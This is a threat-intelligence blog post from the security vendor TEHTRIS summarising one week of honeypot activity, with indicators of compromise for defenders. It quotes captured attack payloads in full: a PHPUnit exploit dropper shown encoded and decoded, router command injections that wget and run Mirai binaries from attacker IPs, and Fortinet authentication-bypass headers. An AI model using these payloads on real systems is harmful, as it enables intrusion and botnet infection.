tehtris.com
Open in
urlscan Pro
162.159.135.42
Public Scan
URL:
https://tehtris.com/en/blog/honeypots-activity-of-the-week-43/
Submission: On July 03 via api from SK — Scanned from DE
Submission: On July 03 via api from SK — Scanned from DE
Form analysis 0 forms found in the DOM
Text Content
Skip to content
* Contact
* Blog
* Glossary
English Français Deutsch Español
/
Toggle menu
* Articles
* Glossary
Go to TEHTRIS website
November 4, 2022
CERTHoneypots
HONEYPOTS: ACTIVITY OF THE WEEK 43
Share on Facebook Share on Twitter Share on LinkedIn
During week 43, TEHTRIS chose to highlight 4 malicious activities observed on
its international honeypot network.
* SSH scan: targeting terraria game servers
* Focus on IP 51.77.247[.]119
* Routers’ vulnerabilities exploit to propagate Mirai botnet
* User agent “Momentum”
* User agent “r00ts3c-owned-you”
* Attempts to exploit a Fortinet vulnerability
SSH SCAN: TARGETING TERRARIA GAME SERVERS
This week, 10 IP addresses attempted to use the login “terraria” (and variants)
more than 560 times on the TEHTRIS honeypot network.
IP sourceCount percentagesASCountry194.163.148[.]727.629%AS 51167 ( Contabo GmbH
)DE139.99.9[.]14721.925%AS 16276 ( OVH SAS )SG15.235.114[.]7913.904%AS 16276 (
OVH SAS )CA167.86.69[.]678.378%AS 51167 ( Contabo GmbH
)DE173.212.196[.]67.487%AS 51167 ( Contabo GmbH )DE135.125.194[.]204.635%AS
16276 ( OVH SAS )DE194.163.149[.]1414.635%AS 51167 ( Contabo GmbH
)DE51.222.12[.]1374.635%AS 16276 ( OVH SAS )CA194.233.80[.]384.456%AS 141995 (
Contabo Asia Private Limited )SG137.74.0[.]2232.317%AS 16276 ( OVH SAS )PL
These 10 IP addresses tested the same 27 login / password combinations.
It is likely that these SSH scans are aimed at detecting and compromising
Terraria game servers. TEHTRIS strongly recommends that you always change your
default credentials to avoid exposing your servers to automatic scans.
FOCUS ON IP 51.77.247[.]119
The French IP address 51.77.247[.]119, from AS 16276 (OVH SAS), launched a web
request on 30/10/22 on a Lithuanian infrastructure including:
* The URL /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, which makes it
possible to exploit the CVE-2017-9841 (CVSS3: 9.8) vulnerability in PHPUnit,
which allows an attacker to remotely execute code on a vulnerable site
* The following query encoded in base 64 in the Raw Data:
<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9wYXN0ZWJpbi5wbC92aWV3L3Jhdy83ZDM4N2YxZSIsIkJ1Z3oucGhwIikpIHsKCWVjaG8gIlN1a3Nlc2dibGsiOwp9IGVsc2UgewoJZWNobyAiZmFpbCI7Cn0KPz4=')); ?>
Decoded from base 64:
<?php
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(adminer("https[:]//pastebin[.]pl/view/raw/7d387f1e","Bugz.php")) {
echo "Suksesgblk";
} else {
echo "fail";
}
?>
The function the attacker seeks to execute, presumably by exploiting the
CVE-2017-9841 vulnerability, aims at downloading a file from the URL
https[:]//pastebin[.]pl/view/raw/7d387f1e. This URL is unfavorably known from
public databases, in particular for uploading a file (sha256:
753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b) containing an
obfuscated PHP webshell. This webshell is called FoxAutoV5 and is available on
https[:]//anonymousfox[.]co.
FoxAutoV5 (sha256 :
753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b)
FoxAutoV5 includes many features for exploring and searching for information on
compromised machines, allowing the attacker to know its environment: where data
with passwords are located, where are the vulnerabilities… It also provides
bruteforce and lateral movement capabilities. This webshell is not very secure
(there is no password to access it, for instance) but is encoded well enough to
make some static searches ineffective and avoid detection. Its score on
VirusTotal is only 2 / 61.
Moreover, the IP 51.77.247[.]119 that caused this event appeared in malicious
files exploiting the Log4j vulnerability (mentioned in week 42).
ROUTERS’ VULNERABILITIES EXPLOIT TO PROPAGATE MIRAI BOTNET
USER AGENT “MOMENTUM”
2 IP addresses were associated with the User Agent “Momentum” and sent the
following URL request:
/GponForm/diag_Form?images/
This URL aims to exploit the vulnerability CVE-2018-10561 (CVSS3: 9.8),
concerning Dasan GPON routers and allows an attacker to bypass authentication
(mentioned in week 39).
If the vulnerability is active, the header indicates the server that will be
contacted to download a malicious file (possibly a Mirai backdoor). Thus:
* US IP 193.47.61[.]60 (AS 211252 DELIS LLC) is associated with the header
‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget
http[:]//185.132.53[.]105g -O-|sh&ipv=0′
* Singaporean IP 185.132.53[.]136 (AS 202437 – Julian Achter) is associated
with the header
‘XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget
http[:]//45.95.55[.]214/o/g -O-|sh&ipv=0′
German IP 45.95.55[.]214 (AS 200303 – LUMASERV Systems) is known to propagate
Mirai. In addition, the Momentum botnet targeting Linux systems was revealed in
late 2019 and is known to distribute Mirai backdoors and enlist devices to
perform DDoS attacks, among other things.
USER AGENT “R00TS3C-OWNED-YOU”
10 IP addresses scanned for known vulnerabilities in some versions of ZyXEL,
Billion (mentioned in week 39) and D-Link routers to spread the Mirai botnet.
IP sourceASCountry111.118.40[.]97AS 7562 ( HCN Dongjak )KR137.25.54[.]5AS 20115
( CHARTER-20115 )US209.93.149[.]48AS 6871 ( British Telecommunications PLC
)GB59.187.205[.]166AS 7562 ( HCN Dongjak )KR143.159.103[.]77AS 6871 ( British
Telecommunications PLC )GB172.91.47[.]43AS 20001 ( TWC-20001-PACWEST
)US74.108.124[.]79AS 701 ( UUNET )US75.67.32[.]138AS 7922 ( COMCAST-7922
)US88.105.235[.]114AS 9105 ( TalkTalk )GB92.14.135[.]177AS 9105 ( TalkTalk )GB
In rawdata, two types of commands are observed:
' remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http[:]//134.195.138[.]33/.nCKx/zx.arm7+-O+arm7;chmod+777+arm7;./arm7 selfr'
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;cd /tmp;wget http[:]//46.19.141[.]122/zyxel;chmod 777 zyxel;sh zyxel;rm -rf arm7;#&r'
IP 134.195.138[.]33 (US – AS 35913 – DEDIPATH-LLC) and 46.19.141[.]122 (CH – AS
51852 – Private Layer INC) are known to distribute the Mirai botnet. The Swiss
IP was referred to in files SHA256
f4a46b4bc24cc2a0ce33d32ee057f31c1370c52caa3c8813669069a1d7351066 and
40efadebd319686595727d07b7b1e1518a89074098c05a2a746f7846efe1e161.
ATTEMPTS TO EXPLOIT A FORTINET VULNERABILITY
Following a PoC published in October 2022 by Horizon3 about the Fortinet
vulnerability CVE-2022-40684 (CVSS3: 9.8) through which an attacker can log in
as an admin, TEHTRIS observes that this PoC was used by attackers, using the
same URL (/api/v2/cmdb/system/admin/admin), the same User Agent (“Report
Runner”) and the same header (except the port was changed from 8888 to 9000) :
['forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;', 'connection: close', 'content-type: application/json', 'accept-encoding: gzip']
6 IP addresses (4 of which are unknown from public databases) made these
requests, presumably in a multi-vulnerability scan that includes CVE-2021-26086
(CVSS3: 5.3) affecting Atlassian Jira’s server and Data Center.
IoC :
IP sourceASCountry139.59.85[.]24AS 14061 ( DIGITALOCEAN-ASN )IN159.65.199[.]18AS
14061 ( DIGITALOCEAN-ASN )NL167.172.246[.]222AS 14061 ( DIGITALOCEAN-ASN
)US172.105.91[.]134AS 63949 ( Linode, LLC )DE172.105.98[.]145AS 63949 ( Linode,
LLC )CA178.128.43[.]0AS 14061 ( DIGITALOCEAN-ASN )GB
As a reminder, attackers use automated systems to scan large portions of the
internet to find vulnerabilities to exploit. Don’t leave the door open !
OUR LATEST ARTICLES
June 20, 2024
HONEYPOTS: FOCUS ON HONEYPOTS HOSTED IN GERMANY
May 31, 2024
UNRELEASED RAAS ANALYSIS- CASHRANSOMWARE
May 30, 2024
HONEYPOTS: FOCUS ON CVE-2024-3273
SUBSCRIBE TO THE TEHTRIS NEWSLETTER.
Once a month, receive the essential news and cyber watch by subscribing to the
TEHTRIS newsletter.
Subscribe to the newsletter
POST NAVIGATION
Previous article Honeypots: activity of the week 42
Next article XDR Success use case : Purple Fox KO
To explore the subject
SIMILAR PUBLICATIONS
CERTHoneypots
HONEYPOTS: FOCUS ON HONEYPOTS HOSTED IN GERMANY
For the first half of May 2024, TEHTRIS honeypots hosted in Germany have been
hit almost... Read more
June 20, 2024
CERTHoneypots
HONEYPOTS: FOCUS ON CVE-2024-3273
The CVE-2024-3273 (CVSSv3: N/A) was disclosed on the 3rd of April. It refers to
a command... Read more
May 30, 2024
CERTHoneypots
OUR SELECTION OF ALERTS ON HONEYPOTS: REPORT 23 – DECEMBER 2023
The following report consists of TEHTRIS observations on our worldwide honeypots
network to provide you with... Read more
December 18, 2023
TEHTRIS XDR Platform
EDR OPTIMUS MTD SIEM NTA Honeypots SOAR CTI Cyberia ZTR
* XDR AI Platform
* TEHTRIS XDR AI PLATFORM
* TEHTRIS XDR AI PLATFORM
* SOAR
* Threat Intelligence
* CYBERIA
* Solutions
* EDR OPTIMUS
* MTD
* SIEM
* NTA
* Honeypots
* ECOSYSTEM
* Discover our ECOSYSTEM
* ZTR
* Use cases
* Industry
* Critical infrastructures
* Public administrations
* Healthcare
* Banking & Insurance
* Transportation
* Service providers
* Retail
* Education
* Choosing TEHTRIS
* Why choose TEHTRIS?
* Why choose TEHTRIS?
* Awards & certifications
* TEHTRIS CERT
* References
* References & testimonials
* MITRE ATTACK
* Gartner
* Services
* Services
* CyberSphere
* CyberSphere Configurations
* Cyber Intelligence
* Cyber & Intelligence Expertise
* Run et deployment support
* Cybersecurity Academy
* Partners
* Service partners
* MSSP
* Distributing partners
* TEHTRIS XCelerity
* Technology partners
* ECOSYSTEM
* Technology partners
* Affiliations
* Becoming a partner
* Company
* About us
* Discover TEHTRIS
* Board Members
* Comex
* TEHTRIS’ teams
* Careers
* Our values
* Join us
* News
* TEHTRIS news
* CSR
* Resources
* Blog
* Products news
* Glossary
* White papers
* Press releases
Cyber or not cyber ?
Once a month, receive the essential news and cyber watch by subscribing to the
TEHTRIS newsletter.
Subscribe to the newsletter
* Legal notice
* Privacy and cookies policy
* Legal documents
* Contact
* Contact DPO
* False positive/False negative
LinkedIn X YouTube
Please take a moment to manageOur Cookies
We've waited to be sure you were actually interested in our content.
Consents certified by
No, thanksI want to chooseOK!
Axeptio consent
Consent Management Platform: Personalize Your Options
Our platform empowers you to tailor and manage your privacy settings, ensuring
compliance with regulations. Customize your preferences to control how your
information is handled.